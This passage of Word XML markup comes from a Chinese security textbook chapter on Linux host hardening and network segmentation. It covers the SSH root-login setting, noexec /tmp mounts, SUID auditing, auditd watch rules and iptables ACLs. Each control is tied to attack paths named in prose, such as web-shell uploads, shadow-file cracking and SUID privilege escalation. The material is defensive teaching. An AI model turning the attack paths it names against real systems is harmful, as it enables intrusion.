        </w:rPr>
        <w:t xml:space="preserve">远程登录（②默认配置常为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PermitRootLogin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">yes，需改为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">no）。即便攻击者获取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">口令，也无法远程直接使用，增加横向移动难度。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1204"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御映射</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：前四卷多次出现利用弱口令成功提权或横向移动的演示（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> John the Ripper </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">破解</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/shadow）。强制口令策略虽不能阻止针对特定漏洞的利用，但可消除最常见、最低成本的入侵通道。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="342"/>
    <w:bookmarkStart w:id="343" w:name="文件系统权限与完整性"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件系统权限与完整性</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者在获得初始立足点后，通常需要写入下载目录、修改可执行文件或读取敏感配置文件来进一步渗透。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1205"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">关键目录的写权限审计</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/tmp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/dev/shm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这类全局可写目录，应确保其挂载选项包含</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">noexec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nosuid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，防止攻击者上传并执行恶意二进制文件。示例</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> fstab </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">行占位：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">tmpfs /tmp tmpfs defaults,noexec,nosuid 0 0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">此配置直接对抗“上传</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web Shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> wget </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">下载提权工具到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> /tmp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">执行”的典型攻击链（回指</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ch11 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件上传</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + Ch15 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提权）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SUID/SGID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">审计与去除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：任何不必要的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">位可执行文件都可能成为提权跳板。CIS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Benchmark </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">要求列举并评估所有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可执行文件：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -perm -4000 -type f -ls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，对非必要文件移除</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">位（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod u-s &lt;FILE&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）。回指</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Ch15，像</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">find</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">vim</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等常见程序的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">若被配置错误，攻击者可通过已知手法直接提权。基线加固必须消除这类错误配置。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">敏感文件权限</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/shadow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应仅为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可读，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">不应包含哈希。通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod 000 /etc/shadow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等收紧权限。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="343"/>
    <w:bookmarkStart w:id="344" w:name="主机侧日志与审计"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">主机侧日志与审计</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">虽然日志工程在第19章专门展开，但在主机加固基线中，必须确保审计系统（auditd）和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> syslog </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务已启用，并记录关键事件（用户登录、命令执行、文件访问）。这属于防御层的内置检测能力，是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SIEM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">告警的数据源头。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1206"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">检查</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> auditd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">服务状态</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo systemctl enable --now auditd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1206"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">添加关键审计规则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（②具体规则因安全目标而异）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-w</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/passwd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> wa </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> identity_changes</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-w</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/sudoers </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> wa </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> sudoers_changes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这些规则会把对关键系统文件的修改写入审计日志，直接为检测“持久化后创建新账户”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“修改</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sudo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">配置提权”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等攻击行为（回指</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ch18 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后渗透）留下告警痕迹。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="344"/>
    <w:bookmarkEnd w:id="345"/>
    <w:bookmarkStart w:id="349" w:name="网络分段限制爆炸半径"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络分段：限制爆炸半径</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络分段是纵深防御在网络层面的核心体现。其目的在于：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">即使边界防火墙被绕过（或攻击来自内部），横向移动仍被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">隔离或内部</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ACL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">阻截，爆炸半径被限制在最小区域内</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。原理基础已见《从位到物联》Ch26</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">子网划分与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ch28 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防火墙/ACL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">过滤规则，本书在此只强调其作为防御措施的攻防语义。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="346" w:name="基于-acl-的分段规则设计"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">基于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ACL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的分段规则设计</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">传统“内外网”二元模型已不满足零信任理念。现代分段要求在不同业务逻辑区域之间部署严格的访问控制列表（ACL），仅允许必要的协议与端口通过。例如，将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">前端、应用服务器、数据库服务器划分为不同子网，并在三层设备或主机防火墙（iptables/nftables）上实施：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1207"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">规则示例（占位，iptables</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">语法②）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：仅允许应用服务器（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;APP_SUBNET&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）访问数据库服务器的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3306 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口，禁止其他任何源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">iptables</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> FORWARD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">APP_SUBNET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> -d </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">DB_SERVER_IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p tcp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--dport</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3306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FORWARD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">DB_SERVER_IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p tcp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--dport</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3306 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-j</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> DROP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1208"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御映射</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：攻击者在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">前端获得初始立足点后，如果想横向移动至数据库服务（回指</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ch9 SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入的后渗透之横向移动），上述</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ACL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
